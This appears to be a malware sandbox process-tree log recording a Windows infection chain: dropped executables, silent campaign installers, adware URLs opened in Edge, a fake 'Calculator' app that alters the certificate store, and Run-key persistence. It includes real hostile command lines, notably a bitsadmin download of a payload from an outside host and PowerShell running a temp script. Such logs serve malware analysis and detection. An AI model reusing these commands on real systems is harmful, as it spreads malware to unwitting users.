C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "LLM8p_bDrZ_4l1sMHXmCXrq8.exe" -F5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-3V3A5.tmp\gQG7ehujuMNa34AUJoZTHfYH.tmp"C:\Users\Admin\AppData\Local\Temp\is-3V3A5.tmp\gQG7ehujuMNa34AUJoZTHfYH.tmp" /SL5="$4017C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-T530Q.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-T530Q.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Reference Assemblies\NLVRILOBGT\foldershare.exe"C:\Program Files\Reference Assemblies\NLVRILOBGT\foldershare.exe" /VERYSILENT5⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Users\Admin\AppData\Local\Temp\4f-bc8a3-34a-bc7b2-bf763876be37d\Qulaepurola.exe"C:\Users\Admin\AppData\Local\Temp\4f-bc8a3-34a-bc7b2-bf763876be37d\Qulaepurola.exe"5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e66⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,16617225312044534049,6042884649164839992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:37⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,16617225312044534049,6042884649164839992,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:27⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad6⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514836⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515136⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872156⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631196⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942316⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ab-537c1-cef-14eb9-66d5c54198dc6\Tiqygaeberi.exe"C:\Users\Admin\AppData\Local\Temp\ab-537c1-cef-14eb9-66d5c54198dc6\Tiqygaeberi.exe"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exe /eufive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exe /eufive7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exe /qn CAMPAIGN="654" & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exeC:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exe /qn CAMPAIGN="654"7⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exeC:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exe7⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exe /mixfive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exe /mixfive7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exe /S & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exe /S7⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
- Checks for any installed AV software in registry
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z8⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\n4B2euMVLh0bciK4wmLM5Ln_.exe"C:\Users\Admin\Pictures\Adobe Films\n4B2euMVLh0bciK4wmLM5Ln_.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4151360.exe"C:\Users\Admin\AppData\Roaming\4151360.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\6948140.exe"C:\Users\Admin\AppData\Roaming\6948140.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\7968681.exe"C:\Users\Admin\AppData\Roaming\7968681.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\2794099.exe"C:\Users\Admin\AppData\Roaming\2794099.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\294455.exe"C:\Users\Admin\AppData\Roaming\294455.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\8882655.exe"C:\Users\Admin\AppData\Roaming\8882655.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kxf1nN_BO3OQXSHBdwGCWokI.exe"C:\Users\Admin\Pictures\Adobe Films\kxf1nN_BO3OQXSHBdwGCWokI.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7fffd258dec0,0x7fffd258ded0,0x7fffd258dee05⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60b0a9e70,0x7ff60b0a9e80,0x7ff60b0a9e906⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=1752 /prefetch:85⤵
- Loads dropped DLL
- Modifies system certificate store
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2620 /prefetch:15⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=2412 /prefetch:85⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2628 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3312 /prefetch:25⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3328 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3272 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3812 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3652 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=2728 /prefetch:85⤵
-
-
-
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe cc6c8b923930ed971de306e7d61c01b5 daOiKgVPfUaRwyNH+IbtQg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2444 -ip 24441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4388 -ip 43881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1416 -ip 14161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2696 -ip 26961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3480 -ip 34801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3696 -ip 36961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5412 -ip 54121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\D93A.exeC:\Users\Admin\AppData\Local\Temp\D93A.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\D93A.exeC:\Users\Admin\AppData\Local\Temp\D93A.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\1E33.exeC:\Users\Admin\AppData\Local\Temp\1E33.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 768 -ip 7681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\345C.exeC:\Users\Admin\AppData\Local\Temp\345C.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 2562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3440 -ip 34401⤵
